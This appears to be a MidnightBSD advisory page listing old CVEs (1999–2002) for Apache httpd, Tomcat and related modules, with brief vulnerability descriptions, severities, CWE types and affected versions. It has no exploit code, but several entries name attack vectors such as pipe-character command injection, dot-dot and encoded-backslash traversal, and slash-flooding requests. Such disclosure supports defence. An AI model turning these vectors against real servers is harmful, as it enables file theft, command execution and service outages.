MidnightBSD

Advisories for apache

CVE-1999-0045 HIGH

List of arbitrary files on Web host via nph-test-cgi script.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
netscape communications_server 1.12
apache http_server 1.0
apache http_server 1.0.2
netscape enterprise_server 2.0a
apache http_server 1.0.5
netscape commerce_server 1.12
apache http_server 0.8.14
apache http_server 1.0.3
netscape communications_server 1.1
apache http_server 0.8.11
apache http_server 1.1
CVE-1999-0067 HIGH

phf CGI program allows remote command execution through shell metacharacters.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-78,

Products Affected

Vendor Product Version
apache http_server 1.0.3
ncsa ncsa_httpd 1.5a
CVE-1999-0070 MEDIUM

test-cgi program allows an attacker to list files on the server.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server *
CVE-1999-0071 HIGH

Apache httpd cookie buffer overflow for versions 1.1.1 and earlier.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.1.1
CVE-1999-0107 MEDIUM

Buffer overflow in Apache 1.2.5 and earlier allows a remote attacker to cause a denial of service with a large number of GET requests containing a large number of / characters.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.0
apache http_server 1.0.2
apache http_server 1.0.5
apache http_server 1.1.1
apache http_server 0.8.14
apache http_server 1.0.3
apache http_server 1.2.5
apache http_server 0.8.11
apache http_server 1.1
CVE-1999-0236 MEDIUM

ScriptAlias directory in NCSA and Apache httpd allowed attackers to read CGI programs.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server *
apache http_server -
illinois ncsa_httpd -
CVE-1999-0289 MEDIUM

The Apache web server for Win32 may provide access to restricted files when a . (dot) is appended to a requested URL.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server -
CVE-1999-0678 MEDIUM

A default configuration of Apache on Debian GNU/Linux sets the ServerRoot to /usr/doc, which allows remote users to read documentation files for the entire server.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server -
CVE-1999-0926 HIGH

Apache allows remote attackers to conduct a denial of service via a large number of MIME headers.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.2.5
CVE-1999-1053 HIGH

guestbook.pl cleanses user-inserted SSI commands by removing text between "<!--" and "-->" separators, which allows remote attackers to execute arbitrary commands when guestbook.pl is run on Apache 1.3.9 and possibly other versions, since Apache allows other closing sequences besides "-->".

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.9
matt_wright matt_wright_guestbook 2.3
CVE-1999-1199 HIGH

Apache WWW server 1.3.1 and earlier allows remote attackers to cause a denial of service (resource exhaustion) via a large number of MIME headers with the same name, aka the "sioux" vulnerability.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server *
CVE-1999-1237 HIGH

Multiple buffer overflows in the smbvalid/smbval SMB authentication library, as used in Apache::AuthenSmb and possibly other modules, allow remote attackers to execute arbitrary commands via (1) a long username, (2) a long password, and (3) other unspecified methods.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-120,

Products Affected

Vendor Product Version
apache http_server -
CVE-1999-1293 HIGH

mod_proxy in Apache 1.2.5 and earlier allows remote attackers to cause a denial of service via malformed FTP commands, which causes Apache to dump core.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server *
CVE-1999-1412 MEDIUM

A possible interaction between Apple MacOS X release 1.0 and Apache HTTP server allows remote attackers to cause a denial of service (crash) via a flood of HTTP GET requests to CGI programs, which generates a large number of processes.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server -
apple macos 1.0
CVE-2000-0505 MEDIUM

The Apache 1.3.x HTTP server for Windows platforms allows remote attackers to list directory contents by requesting a URL containing a large number of / characters.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
ibm http_server 1.3.3
apache http_server 1.3.11
apache http_server 1.3.12
apache http_server 1.3.9
apache http_server 1.3.6
ibm http_server 1.3.6.2
CVE-2000-0672 MEDIUM

The default configuration of Jakarta Tomcat does not restrict access to the /admin context, which allows remote attackers to read arbitrary files by directly calling the administrative servlets to add a context for the root directory.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache tomcat 3.1
apache tomcat 3.0
CVE-2000-0759 MEDIUM

Jakarta Tomcat 3.1 under Apache reveals physical path information when a remote attacker requests a URL that does not exist, which generates an error message that includes the physical path.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 3.1
CVE-2000-0760 MEDIUM

The Snoop servlet in Jakarta Tomcat 3.1 and 3.0 under Apache reveals sensitive system information when a remote attacker requests a nonexistent URL with a .snp extension.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 3.1
apache tomcat 3.0
CVE-2000-0868 MEDIUM

The default configuration of Apache 1.3.12 in SuSE Linux 6.4 allows remote attackers to read source code for CGI scripts by replacing the /cgi-bin/ in the requested URL with /cgi-bin-sdb/.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.12
suse suse_linux 6.3
suse suse_linux 6.4
CVE-2000-0869 MEDIUM

The default configuration of Apache 1.3.12 in SuSE Linux 6.4 enables WebDAV, which allows remote attackers to list arbitrary directories via the PROPFIND HTTP request method.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.12
suse suse_linux 6.3
suse suse_linux 7.0
suse suse_linux 6.2
suse suse_linux 6.1
suse suse_linux 6.0
suse suse_linux 6.4
CVE-2000-0913 MEDIUM

mod_rewrite in Apache 1.3.12 and earlier allows remote attackers to read arbitrary files if a RewriteRule directive is expanded to include a filename whose name contains a regular expression.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.0
apache http_server 1.3.11
apache http_server 1.3.12
apache http_server 1.0.2
apache http_server 1.0.5
apache http_server 1.1.1
apache http_server 0.8.14
apache http_server 1.0.3
apache http_server 0.8.11
apache http_server 1.1
CVE-2000-1204 MEDIUM

Vulnerability in the mod_vhost_alias virtual hosting module for Apache 1.3.9, 1.3.11 and 1.3.12 allows remote attackers to obtain the source code for CGI programs if the cgi-bin directory is under the document root.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.11
apache http_server 1.3.12
apache http_server 1.3.9
CVE-2000-1205 MEDIUM

Cross-site scripting vulnerabilities in Apache 1.3.0 through 1.3.11 allow remote attackers to execute script as other web site visitors via (1) the printenv CGI (printenv.pl), which does not encode its output, (2) pages generated by the ap_send_error_response function such as a default 404, which does not add an explicit charset, or (3) various messages that are generated by certain Apache modules or core code. NOTE: the printenv issue might still exist for web browsers that can render text/plain content types as HTML, such as Internet Explorer, but CVE regards this as a design limitation of those browsers, not Apache. The printenv.pl/acuparam vector, disclosed on 20070724, is one such variant.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache http_server 1.3.5
apache http_server 1.3.11
apache http_server 1.3.9
apache http_server 1.3.1
apache http_server 1.3.4
apache http_server 1.3.6
apache http_server 1.3.8
apache http_server 1.3.7
apache http_server 1.3.10
apache http_server 1.3.2
apache http_server 1.3.0
apache http_server 1.3.3
CVE-2000-1206 MEDIUM

Vulnerability in Apache httpd before 1.3.11, when configured for mass virtual hosting using mod_rewrite, or mod_vhost_alias in Apache 1.3.9, allows remote attackers to retrieve arbitrary files.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.10
apache http_server 1.3.9
CVE-2000-1210 MEDIUM

Directory traversal vulnerability in source.jsp of Apache Tomcat before 3.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the argument to source.jsp.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat *
CVE-2000-1247 LOW

The default configuration of the jserv-status handler in jserv.conf in Apache JServ 1.1.2 includes an "allow from 127.0.0.1" line, which allows local users to discover JDBC passwords or other sensitive information via a direct request to the jserv/ URI.

CVSS 2.0

Severity: LOW

Problem Type: CWE-16,

Products Affected

Vendor Product Version
apache jserv 1.1.2
CVE-2001-0042 MEDIUM

PHP 3.x (PHP3) on Apache 1.3.6 allows remote attackers to read arbitrary files via a modified .. (dot dot) attack containing "%5c" (encoded backslash) sequences.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3
CVE-2001-0131 LOW

htpasswd and htdigest in Apache 2.0a9, 1.3.14, and others allow local users to overwrite arbitrary files via a symlink attack.

CVSS 2.0

Severity: LOW

Problem Type: CWE-59,

Products Affected

Vendor Product Version
apache http_server 2.0
apache http_server 1.3.14
debian debian_linux 2.2
CVE-2001-0590 MEDIUM

Apache Software Foundation Tomcat Servlet prior to 3.2.2 allows a remote attacker to read the source code to arbitrary 'jsp' files via a malformed URL request which does not end with an HTTP protocol specification (i.e. HTTP/1.0).

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat *
CVE-2001-0729 MEDIUM

Apache 1.3.20 on Windows servers allows remote attackers to bypass the default index page and list directory contents via a URL with a large number of / (slash) characters.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.20
CVE-2001-0730 MEDIUM

split-logfile in Apache 1.3.20 allows remote attackers to overwrite arbitrary files that end in the .log extension via an HTTP request with a / (slash) in the Host: header.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.20
CVE-2001-0731 MEDIUM

Apache 1.3.20 with Multiviews enabled allows remote attackers to view directory contents and bypass the index page via a URL containing the "M=D" query string.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.20
CVE-2001-0766 HIGH

Apache on MacOS X Client 10.0.3 with the HFS+ file system allows remote attackers to bypass access restrictions via a URL that contains some characters whose case is not matched by Apache's filters.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-178,

Products Affected

Vendor Product Version
apache http_server 1.3.14
CVE-2001-0829 MEDIUM

A cross-site scripting vulnerability in Apache Tomcat 3.2.1 allows a malicious webmaster to embed JavaScript in a request for a .JSP file, which causes the JavaScript to be inserted into an error message.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 3.2.1
CVE-2001-0917 MEDIUM

Jakarta Tomcat 4.0.1 allows remote attackers to reveal physical path information by requesting a long URL with a .JSP extension.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 4.0.1
CVE-2001-0925 MEDIUM

The default installation of Apache before 1.3.19 allows remote attackers to list directories instead of the multiview index.html file via an HTTP request for a path that contains many / (slash) characters, which causes the path to be mishandled by (1) mod_negotiation, (2) mod_dir, or (3) mod_autoindex.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache http_server 1.3.11
apache http_server 1.3.12
apache http_server 1.3.14
apache http_server 1.3.17
debian debian_linux 2.2
CVE-2001-1072 MEDIUM

Apache with mod_rewrite enabled on most UNIX systems allows remote attackers to bypass RewriteRules by inserting extra / (slash) characters into the requested path, which causes the regular expression in the RewriteRule to fail.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.19
apache http_server 1.3.14
apache http_server 1.3.17
CVE-2001-1342 MEDIUM

Apache before 1.3.20 on Windows and OS/2 systems allows remote attackers to cause a denial of service (GPF) via an HTTP request for a URI that contains a large number of / (slash) or other characters, which causes certain functions to dereference a null pointer.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.19
apache http_server 1.3.12
apache http_server 1.3.14
apache http_server 1.3.17
apache http_server 1.3.18
apache http_server 1.3.15
apache http_server 1.3.16
CVE-2001-1449 HIGH

The default installation of Apache before 1.3.19 on Mandrake Linux 7.1 through 8.0 and Linux Corporate Server 1.0.1 allows remote attackers to list the directory index of arbitrary web directories.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.11
apache http_server 1.3.9
apache http_server 1.3.1
mandrakesoft mandrake_linux 8.0
apache http_server 1.3.17
mandrakesoft mandrake_single_network_firewall 7.2
apache http_server 1.3.4
mandrakesoft mandrake_linux 7.3
apache http_server 1.3.6
apache http_server 1.3
apache http_server 1.3.12
apache http_server 1.3.14
apache http_server 1.3.18
mandrakesoft mandrake_linux_corporate_server 1.0.1
mandrakesoft mandrake_linux 7.1
apache http_server 1.3.3
CVE-2001-1534 LOW

mod_usertrack in Apache 1.3.11 through 1.3.20 generates session IDs using predictable information including host IP address, system time and server process ID, which allows local users to obtain session IDs and bypass authentication when these session IDs are used for authentication.

CVSS 2.0

Severity: LOW

Problem Type: CWE-384,

Products Affected

Vendor Product Version
apache http_server *
CVE-2001-1556 MEDIUM

The log files in the Apache web server contain information directly supplied by clients and do not filter or quote control characters, which could allow remote attackers to hide HTTP requests and spoof source IP addresses when logs are viewed with UNIX programs such as cat, tail, and grep.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-532,

Products Affected

Vendor Product Version
apache http_server *
CVE-2001-1563 HIGH

Unknown vulnerability in Tomcat 3.2.1 running on HP Secure OS for Linux 1.0 allows attackers to access servlet resources. NOTE: due to the vagueness of the vendor advisory, it is not clear whether this issue is already covered by other CVE identifiers.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
hp secure_os 1.0
apache tomcat 3.2.1
CVE-2002-0061 HIGH

Apache for Win32 before 1.3.24, and 2.0.x before 2.0.34-beta, allows remote attackers to execute arbitrary commands via shell metacharacters (a | pipe character) provided as arguments to batch (.bat) or .cmd scripts, which are sent unfiltered to the shell interpreter, typically cmd.exe.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-78,

Products Affected

Vendor Product Version
apache http_server *
CVE-2002-0185 HIGH

mod_python version 2.7.6 and earlier allows a module indirectly imported by a published module to then be accessed via the publisher, which allows remote attackers to call possibly dangerous functions from the imported module.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache mod_python *
CVE-2002-0240 MEDIUM

PHP, when installed with Apache and configured to search for index.php as a default web page, allows remote attackers to obtain the full pathname of the server via the HTTP OPTIONS method, which reveals the pathname in the resulting error message.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0.28
CVE-2002-0249 MEDIUM

PHP for Windows, when installed on Apache 2.0.28 beta as a standalone CGI module, allows remote attackers to obtain the physical path of the php.exe via a request with malformed arguments such as /123, which leaks the pathname in the error message.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0.28
CVE-2002-0257 HIGH

Cross-site scripting vulnerability in auction.pl of MakeBid Auction Deluxe 3.30 allows remote attackers to obtain information from other users via the form fields (1) TITLE, (2) DESCTIT, (3) DESC, (4) searchstring, (5) ALIAS, (6) EMAIL, (7) ADDRESS1, (8) ADDRESS2, (9) ADDRESS3, (10) PHONE1, (11) PHONE2, (12) PHONE3, or (13) PHONE4.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.19
apache http_server 1.3.22
apache http_server 1.3.20
usanet_creations makebid_auction_deluxe 3.30
apache http_server 1.3.17
apache http_server 1.3.18
CVE-2002-0392 HIGH

Apache 1.3 through 1.3.24, and Apache 2.0 through 2.0.36, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a chunk-encoded HTTP request that causes Apache to use an incorrect size.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server *
debian debian_linux 2.2
CVE-2002-0493 HIGH

Apache Tomcat may be started without proper security settings if errors are encountered while reading the web.xml file, which could allow attackers to bypass intended restrictions.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-254,

Products Affected

Vendor Product Version
apache tomcat *
CVE-2002-0654 MEDIUM

Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to determine the full pathname of the server via (1) a request for a .var file, which leaks the pathname in the resulting error message, or (2) via an error message that occurs when a script (child process) cannot be invoked.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0
apache http_server 2.0.32
apache http_server 2.0.38
apache http_server 2.0.39
apache http_server 2.0.34
apache http_server 2.0.35
apache http_server 2.0.28
apache http_server 2.0.37
apache http_server 2.0.36
CVE-2002-0661 HIGH

Directory traversal vulnerability in Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to read arbitrary files and execute commands via .. (dot dot) sequences containing \ (backslash) characters.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0
apache http_server 2.0.32
apache http_server 2.0.38
apache http_server 2.0.39
apache http_server 2.0.34
apache http_server 2.0.35
apache http_server 2.0.28
apache http_server 2.0.37
apache http_server 2.0.36
CVE-2002-0682 HIGH

Cross-site scripting vulnerability in Apache Tomcat 4.0.3 allows remote attackers to execute script as other web users via script in a URL with the /servlet/ mapping, which does not filter the script when an exception is thrown by the servlet.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 4.0.3
CVE-2002-0839 HIGH

The shared memory scoreboard in the HTTP daemon for Apache 1.3.x before 1.3.27 allows any user running as the Apache UID to send a SIGUSR1 signal to any process as root, resulting in a denial of service (process kill) or possibly other behaviors that would not normally be allowed, by modifying the parent[].pid and parent[].last_rtime segments in the scoreboard.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server *
debian debian_linux 3.0
debian debian_linux 2.2
CVE-2002-0840 MEDIUM

Cross-site scripting (XSS) vulnerability in the default error page of Apache 2.0 before 2.0.43, and 1.3.x up to 1.3.26, when UseCanonicalName is "Off" and support for wildcard DNS is present, allows remote attackers to execute script as other web page visitors via the Host: header, a different vulnerability than CAN-2002-1157.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
oracle oracle8i 8.1.7.1
apache http_server 1.3.19
apache http_server 2.0.39
oracle oracle9i 9.0
apache http_server 1.3.4
oracle oracle9i 9.0.1.3
apache http_server 2.0.36
apache http_server 2.0
apache http_server 1.3.22
apache http_server 1.3.14
oracle application_server 1.0.2.2
oracle oracle9i 9.0.1
oracle oracle9i 9.0.1.2
apache http_server 2.0.41
oracle database_server 9.2.2
oracle database_server 8.1.7
oracle application_server 1.0.2
apache http_server 2.0.42
apache http_server 1.3.11
apache http_server 1.3.23
apache http_server 1.3.24
apache http_server 1.3.25
apache http_server 2.0.32
apache http_server 2.0.38
oracle application_server 1.0.2.1s
apache http_server 1.3.9
apache http_server 1.3.1
oracle oracle9i 9.0.2
apache http_server 2.0.40
apache http_server 1.3.17
apache http_server 1.3.26
apache http_server 1.3.6
apache http_server 1.3
apache http_server 2.0.35
oracle oracle8i 8.1.7_.0.0_enterprise
oracle oracle8i 8.1.7_.1.0_enterprise
apache http_server 1.3.12
oracle application_server 9.0.2.1
oracle database_server 9.2.1
apache http_server 1.3.20
oracle application_server 9.0.2
apache http_server 1.3.18
oracle oracle8i 8.1.7
apache http_server 2.0.28
apache http_server 2.0.37
apache http_server 1.3.3
CVE-2002-0843 HIGH

Buffer overflows in the ApacheBench benchmark support program (ab.c) in Apache before 1.3.27, and Apache 2.x before 2.0.43, allow a malicious web server to cause a denial of service and possibly execute arbitrary code via a long response.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
oracle oracle8i 8.1.7.1
apache http_server 1.3.19
oracle oracle8i 8.1.7.0.0_enterprise
apache http_server 1.3.4
apache http_server 1.3.22
apache http_server 1.3.14
oracle application_server 1.0.2.2
oracle database_server 9.2.2
oracle database_server 8.1.7
oracle application_server 1.0.2
apache http_server 1.3.11
apache http_server 1.3.23
apache http_server 1.3.24
apache http_server 1.3.25
oracle application_server 1.0.2.1s
apache http_server 1.3.9
apache http_server 1.3.1
apache http_server 1.3.17
apache http_server 1.3.26
apache http_server 1.3.6
apache http_server 1.3
oracle oracle8i 8.1.7.1.0_enterprise
apache http_server 1.3.12
oracle application_server 9.0.2.1
apache http_server 1.3.20
oracle application_server 9.0.2
apache http_server 1.3.18
oracle oracle8i 8.1.7
apache http_server 1.3.3
CVE-2002-0935 MEDIUM

Apache Tomcat 4.0.3, and possibly other versions before 4.1.3 beta, allows remote attackers to cause a denial of service (resource exhaustion) via a large number of requests to the server with null characters, which causes the working threads to hang.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 4.0.3
CVE-2002-0936 MEDIUM

The Java Server Pages (JSP) engine in Tomcat allows web page owners to cause a denial of service (engine crash) on the web server via a JSP page that calls WPrinterJob().pageSetup(null,null).

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 4.0.3
CVE-2002-1148 MEDIUM

The default servlet (org.apache.catalina.servlets.DefaultServlet) in Tomcat 4.0.4 and 4.1.10 and earlier allows remote attackers to read source code for server files via a direct request to the servlet.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 3.3.1
apache tomcat 4.0.0
apache tomcat 3.1.1
apache tomcat 3.2.1
apache tomcat 4.1.10
apache tomcat 3.0
apache tomcat 4.0.1
apache tomcat 3.2
apache tomcat 4.0.4
apache tomcat 4.1.9
apache tomcat 3.2.2
apache tomcat 3.2.3
apache tomcat 4.1.0
apache tomcat 3.1
apache tomcat 3.3
apache tomcat 3.2.4
apache tomcat 4.0.3
apache tomcat 4.0.2
apache tomcat 4.1.3
CVE-2002-1156 MEDIUM

Apache 2.0.42 allows remote attackers to view the source code of a CGI script via a POST request to a directory with both WebDAV and CGI enabled.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0.42
CVE-2002-1233 LOW

A regression error in the Debian distributions of the apache-ssl package (before 1.3.9 on Debian 2.2, and before 1.3.26 on Debian 3.0), for Apache 1.3.27 and earlier, allows local users to read or modify the Apache password file via a symlink attack on temporary files when the administrator runs (1) htpasswd or (2) htdigest, a re-introduction of a vulnerability that was originally identified and addressed by CVE-2001-0131.

CVSS 2.0

Severity: LOW

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.19
apache http_server 1.3.23
apache http_server 1.3.24
apache http_server 1.3.22
apache http_server 1.3.25
apache http_server 1.3.20
apache http_server 1.3.17
apache http_server 1.3.26
apache http_server 1.3.18
apache http_server 1.3.27
CVE-2002-1394 HIGH

Apache Tomcat 4.0.5 and earlier, when using both the invoker servlet and the default servlet, allows remote attackers to read source code for server files or bypass certain protections, a variant of CAN-2002-1148.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 4.1.0
apache tomcat 4.0.0
apache tomcat 4.0.5
apache tomcat 4.1.10
apache tomcat 4.0.1
apache tomcat 4.0.3
apache tomcat 4.0.2
apache tomcat 4.0.4
apache tomcat 4.1.3
apache tomcat 4.1.9
CVE-2002-1567 MEDIUM

Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1 allows remote attackers to execute arbitrary web script and steal cookies via a URL with encoded newlines followed by a request to a .jsp file whose name contains the script.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 4.1.0
CVE-2002-1592 MEDIUM

The ap_log_rerror function in Apache 2.0 through 2.0.35, when a CGI application encounters an error, sends error messages to the client that include the full path for the server, which allows remote attackers to obtain sensitive information.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0
apache http_server 2.0.32
apache http_server 2.0.35
apache http_server 2.0.28
CVE-2002-1593 MEDIUM

mod_dav in Apache before 2.0.42 does not properly handle versioning hooks, which may allow remote attackers to kill a child process via a null dereference and cause a denial of service (CPU consumption) in a preforked multi-processing module.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0
apache http_server 2.0.32
apache http_server 2.0.38
apache http_server 2.0.41
apache http_server 2.0.39
apache http_server 2.0.40
apache http_server 2.0.35
apache http_server 2.0.28
apache http_server 2.0.37
apache http_server 2.0.36
CVE-2002-1658 MEDIUM

Buffer overflow in htdigest in Apache 1.3.26 and 1.3.27 may allow attackers to execute arbitrary code via a long user argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.19
apache http_server 1.3.11
apache http_server 1.3.23
apache http_server 1.3.24
apache http_server 1.3.25
apache http_server 1.3.9
apache http_server 1.3.1
apache http_server 1.3.17
apache http_server 1.3.26
apache http_server 1.3.4
apache http_server 1.3.6
apache http_server 1.3.12
apache http_server 1.3.22
apache http_server 1.3.14
apache http_server 1.3.20
apache http_server 1.3.18
apache http_server 1.3.27
apache http_server 1.3.3
CVE-2002-1850 MEDIUM

mod_cgi in Apache 2.0.39 and 2.0.40 allows local users and possibly remote attackers to cause a denial of service (hang and memory consumption) by causing a CGI script to send a large amount of data to stderr, which results in a read/write deadlock between httpd and the CGI script.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-667,

Products Affected

Vendor Product Version
apache http_server 2.0.39
apache http_server 2.0.40
CVE-2002-1895 MEDIUM

The servlet engine in Jakarta Apache Tomcat 3.3 and 4.0.4, when using IIS and the ajp1.3 connector, allows remote attackers to cause a denial of service (crash) via a large number of HTTP GET requests for an MS-DOS device such as AUX, LPT1, CON, or PRN.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 3.3
apache tomcat 4.0.4
CVE-2002-2006 MEDIUM

The default installation of Apache Tomcat 4.0 through 4.1 and 3.0 through 3.3.1 allows remote attackers to obtain the installation path and other sensitive system information via the (1) SnoopServlet or (2) TroubleShooter example servlets.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 3.3.1
apache tomcat 4.0.0
apache tomcat 3.1.1
apache tomcat 3.2.1
apache tomcat 3.0
apache tomcat 4.0.1
apache tomcat 3.2
apache tomcat 3.2.3
apache tomcat 4.1.0
apache tomcat 3.1
apache tomcat 3.3
apache tomcat 3.2.4
apache tomcat 4.0.3
apache tomcat 4.0.2
CVE-2002-2007 MEDIUM

The default installations of Apache Tomcat 3.2.3 and 3.2.4 allow remote attackers to obtain sensitive system information such as directory listings and web root path, via erroneous HTTP requests for Java Server Pages (JSP) in the (1) test/jsp, (2) samples/jsp and (3) examples/jsp directories, or the (4) test/realPath.jsp servlet, which leaks pathnames in error messages.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 3.2.4
apache tomcat 3.2.3
CVE-2002-2008 MEDIUM

Apache Tomcat 4.0.3 for Windows allows remote attackers to obtain the web root path via an HTTP request for a resource that does not exist, such as lpt9, which leaks the information in an error message.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 4.0.3
CVE-2002-2009 MEDIUM

Apache Tomcat 4.0.1 allows remote attackers to obtain the web root path via HTTP requests for JSP files preceded by (1) +/, (2) >/, (3) </, and (4) %20/, which leaks the pathname in an error message.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 4.0.1
